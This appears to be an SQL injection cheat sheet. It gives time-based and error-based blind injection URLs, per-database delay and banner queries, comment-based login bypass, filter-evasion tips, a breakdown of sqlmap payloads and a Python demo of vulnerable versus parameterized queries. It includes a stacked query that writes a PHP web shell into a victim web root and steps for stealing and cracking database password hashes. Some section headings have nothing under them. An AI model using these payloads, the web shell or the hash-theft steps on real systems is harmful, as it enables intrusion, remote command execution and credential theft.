1.1 Injection statements (time-based blind injection using BENCHMARK)
Each request below tests one character of the target value: if the character matches, BENCHMARK() burns CPU and the response is delayed; otherwise IF() returns NULL at once. The injected username closes the original string literal, appends a UNION SELECT with the same number of columns as the original query (two here), and comments out the rest of the statement. The "--" must be followed by whitespace (here the space before the password parameter), since MySQL only treats "--" as a comment when whitespace follows it.
Database name
localhost:8080/scripttest/userservlet?username=' UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(101), BENCHMARK(10000000,ENCODE('SASSSG','zcxczx')), NULL), COUNT(*) FROM (SELECT DATABASE() AS current) AS tbl;-- &password=w
Determine the system user name of the database connection
localhost:8080/scripttest/userservlet?username=' UNION SELECT IF(SUBSTRING(current,3,1)=CHAR(101), BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')), NULL), COUNT(*) FROM (SELECT SYSTEM_USER() AS current) AS tbl;-- &password=w
Determine the current database user
localhost:8080/scripttest/userservlet?username=' UNION SELECT IF(SUBSTRING(current,3,1)=CHAR(101), BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')), NULL), COUNT(*) FROM (SELECT CURRENT_USER() AS current) AS tbl;-- &password=w
Determine the ID generated by the last INSERT on this connection (LAST_INSERT_ID())
localhost:8080/scripttest/userservlet?username=' UNION SELECT IF(SUBSTRING(current,3,1)=CHAR(101), BENCHMARK(10000000,ENCODE('MSG','by 5 seconds')), NULL), COUNT(*) FROM (SELECT LAST_INSERT_ID() AS current) AS tbl;-- &password=w
Determine the name of a table in a database (oldest table first; LIMIT selects which table, SUBSTRING selects which character)
localhost:8080/scripttest/userservlet?username=' UNION SELECT IF(SUBSTRING(current,1,1)=CHAR(N), BENCHMARK(10000000,ENCODE('MSG','by 5 Seconds')), NULL), COUNT(*) FROM (SELECT table_name AS current FROM INFORMATION_SCHEMA.TABLES WHERE table_schema='MYTEST' ORDER BY create_time LIMIT 0,1) AS tbl;-- &password=w
(CHAR(N) is the ASCII code of the character being tested, e.g. CHAR(101) = 'e'.)
Getting database banner (version) information
Non-blind (the result is returned directly in the page):
PostgreSQL: SELECT version()
Oracle PL/SQL: SELECT banner FROM v$version
SELECT banner FROM v$version WHERE rownum=1
MySQL: SELECT version(); SELECT @@version
Microsoft SQL Server: SELECT @@version
@@servername: name of the local server on which SQL Server is installed
@@language: name of the language currently in use
@@spid: session (server process) ID of the current connection
Time-delay methods for each database
PostgreSQL: SELECT pg_sleep(n)
Oracle PL/SQL:
BEGIN DBMS_LOCK.SLEEP(5); END;
or 1=DBMS_PIPE.RECEIVE_MESSAGE('RDS',10)
MySQL: SLEEP(n); BENCHMARK(100000,ENCODE('HELLO','MON')) (the delay produced by BENCHMARK depends on the server's CPU and load, so SLEEP(), available from MySQL 5.0.12, gives a more predictable signal)
Microsoft SQL Server: xxx.jsp?uid=22; WAITFOR DELAY '0:0:5'; --
Error messages differ between databases in UNION injection
Error-based blind injection
www.victim/xxx/xxx/aaa.asp?id=12/is_srvrolemember('sysadmin')
The function returns:
1 if the current login is a member of the role
0 if it is not
NULL if the role does not exist
So with 12/x: when x is 1 the page renders normally; when x is 0 the division by zero raises an error, and membership is inferred from which page comes back. (12/NULL evaluates to NULL rather than an error, so a non-existent role gives a third outcome: no error, but no matching record.)
A CASE expression can be used the same way:
CASE WHEN condition THEN action1 ELSE action2 END
MySQL can use either CASE or IF:
SELECT CASE WHEN DATABASE()='mytest' THEN 1 ELSE 0 END;
The IF function is equivalent:
SELECT IF(DATABASE()='mytes1',1,0);
Terminating the SQL statement (comment out the rest of the original statement and replace it with your own; the comment syntaxes of the individual databases are):
SQL Server, Oracle, PostgreSQL: --, /* */
MySQL: -- (must be followed by a space), #, /* */
Usage:
1. /**/ can stand in for a space when spaces are filtered.
2. Comments help when probing for an injection point: if appending a comment to the parameter returns the same page as the unmodified request, the parameter is probably injectable.
3. Impersonate a known user: SELECT * FROM administrators WHERE username='admin'/*' AND password='***'; this only works when the back-end logic simply takes the ID of the row the SQL returns and logs the user in by that ID. If the back end also checks that the returned record matches the submitted input (for example compares the stored password with the one entered), it does not work.
4. Identify the database type through string concatenation:
Database              | Concatenation
SQL Server            | 'a'+'b' = 'ab'
MySQL                 | 'a' 'b' = 'ab'
Oracle and PostgreSQL | 'a'||'b' = 'ab'
The method is to split a string parameter at the injection point using each concatenation syntax in turn; the variant that returns the original page reveals the database.
Multi-statement execution
1. SQL Server 6.0 added the ability to execute multiple SQL statements on one connection handle. This means that an UPDATE or INSERT can be appended after the normal query, for example to change permissions or to add and delete users. Such features are usually disabled.
2. When MySQL runs on the same server as the web server and the user running MySQL has sufficient privileges (the FILE privilege, with secure_file_priv not restricting the target directory, and write access for the mysqld process to the web root), the following request writes a file into the web directory that executes arbitrary commands:
http://www.victim.com/search.php?s=test'; SELECT '<?php echo shell_exec($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/victim.com/shell.php';--
Stacked queries
Whether stacked queries work depends on the client library as much as on the database: PHP allows stacked queries against PostgreSQL, but the classic mysql_query() interface for MySQL does not (mysqli_multi_query() does).
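The two behaviours described in this section and the previous one (comment termination of the WHERE clause, and the dependence of stacked queries on the client API), as an added example that is not code from the original page. It uses Python's sqlite3 module and an in-memory database standing in for the application's MySQL or SQL Server back end; the administrators table, its rows and the STACKED_PAYLOAD string are constructed for the example. SQLite accepts an unterminated /* just like the page's admin'/* trick, and its execute() refuses more than one statement while executescript() runs them all, which mirrors the mysql_query() versus mysqli_multi_query() difference.

```python
import sqlite3

# Constructed sample schema for the demonstration (not data from the original page).
SCHEMA = """
CREATE TABLE administrators (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
INSERT INTO administrators VALUES (1, 'admin', 's3cret');
INSERT INTO administrators VALUES (2, 'bob', 'hunter2');
"""

# Hypothetical stacked-query payload: a harmless SELECT followed by a second statement.
STACKED_PAYLOAD = "SELECT id FROM administrators WHERE username='x'; DROP TABLE administrators"


def fresh_db():
    """In-memory SQLite database standing in for the application's database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(conn, username, password):
    """Login query built by string concatenation (the flaw the page describes).
    Returns the id of the matched row, which a naive back end would then trust."""
    sql = ("SELECT id FROM administrators WHERE username='" + username
           + "' AND password='" + password + "'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def safe_login(conn, username, password):
    """Same query with bound parameters: input can never alter the SQL text,
    so comment sequences in the username are just characters of the value."""
    row = conn.execute(
        "SELECT id FROM administrators WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def table_exists(conn, name):
    return conn.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)
    ).fetchone() is not None


def survives_stacked_query(conn, sql, allow_multi):
    """Run attacker-controlled SQL through the driver and report whether the
    administrators table still exists afterwards.  sqlite3's execute() refuses
    more than one statement (like PHP's mysql_query()), while executescript()
    runs them all (like mysqli_multi_query() or PHP with PostgreSQL)."""
    try:
        if allow_multi:
            conn.executescript(sql)
        else:
            conn.execute(sql)
    except (sqlite3.Error, sqlite3.Warning):
        pass  # the single-statement API rejects the stacked statement
    return table_exists(conn, "administrators")


if __name__ == "__main__":
    db = fresh_db()
    # "/*" swallows the rest of the WHERE clause: the password check never runs.
    print(vulnerable_login(db, "admin'/*", "wrong"))                    # 1
    # "--" to end of line works the same way (MySQL needs a space after it).
    print(vulnerable_login(db, "admin'-- ", "wrong"))                   # 1
    # /**/ standing in for spaces when spaces are filtered.
    print(vulnerable_login(db, "admin'/**/OR/**/1=1/**/--", "wrong"))  # 1
    print(safe_login(db, "admin'/*", "wrong"))                          # None
    print(survives_stacked_query(fresh_db(), STACKED_PAYLOAD, False))  # True
    print(survives_stacked_query(fresh_db(), STACKED_PAYLOAD, True))   # False
```

The point of the last two calls is the one the stacked-query paragraph makes: the same injected text is harmless through a single-statement API and destructive through a multi-statement one, so "the database supports it" is not the whole question.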
Stealing password hashes, and cracking tools
SQL Server: NGSSQLCrack or Cain & Abel
From SQL Server 2005 onward the hashes are in the sys.sql_logins view (password_hash column).
Before 2005 they were generated by the pwdencrypt() function and stored in the sysxlogins table of the master database.
MySQL: John the Ripper with the bigpatch applied
PostgreSQL: if the username is bar and the password is foo, the stored value is hash='md5' || md5('foobar') = md53858f62230ac3c915f300c664312c63f (the MD5 is taken over the password followed by the username); storing passwords in plaintext is also allowed.
Oracle: the PASSWORD column of the SYS.USER$ table stores the hashed passwords of database accounts, and DBA_USERS is a view pointing at that table. From 11g the hash no longer appears in DBA_USERS; the SHA-1 hash is in the SPARE4 column of SYS.USER$, and by default both the old (DES) and the new (SHA-1) hash exist there. For SHA-1 the fastest cracker is gsauditor; for DES the fastest is Laszlo Toth's tool. The following are common commands to retrieve them.
Out-of-band channels
Reading sensitive system files through SQL injection
Bypassing filters
1. Keyword filters can often be bypassed by changing the case of the keywords.
2. SELECT master.dbo.fn_varbintohexstr(password_hash) FROM sys.sql_logins WHERE name='sa' (converts the varbinary hash to a hex string so it can be displayed in the page)
sqlmap injection script analysis
Time-based blind
sqlmap's time-based blind injection is mainly used against MySQL; the two statements below are examples.
Determining the database name
SELECT * FROM userinfo WHERE username='Illidan' RLIKE (IF(ORD(MID((SELECT IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,1))>64, SLEEP(5), 2510)) AND 'vvvl'='vvvl' AND password='198226198484';
Determining a database password
SELECT * FROM userinfo WHERE username='Illidan' RLIKE (IF(ORD(MID((SELECT IFNULL(CAST(password AS CHAR),0x20) FROM mytest.userinfo ORDER BY password LIMIT 0,1),1,1))>8, SLEEP(5), 2136)) AND 'ndhl'='ndhl' AND password='198226198484';
Description of the SQL statement
Reading outward from the centre of the RLIKE expression:
1. CAST(xxx AS type) converts the target value to the given data type
2. IFNULL(expr1,expr2) returns expr1 if expr1 is not NULL, otherwise expr2
3. MID() extracts a substring, like SUBSTRING
4. ORD() reads the ASCII code of the character
5. IF(xx>64, SLEEP(5), 2510): if the value is greater than 64, sleep for 5 seconds; the third argument is what the expression returns when the condition is false
6. sqlmap homes in on the target value by bisection: each comparison (>64, then >32 or >96, and so on) halves the range of possible codes, so one character costs about eight requests
RLIKE (regular-expression match) can be used instead of a UNION to attach a custom SELECT statement, without the requirement that both sides have the same number of columns.
0x20 is a space (used as the IFNULL default so that a NULL value does not break the comparison)
A UNION requires knowing the number of columns of the original SQL statement, because a UNION concatenating two queries requires both to have the same number of columns; this is commonly needed in UNION-based blind injection
The CAST() and CONVERT() functions take a value of one type and produce a value of another type
MID() extracts a substring
ORD() returns the ASCII code of the first character
On SQL injection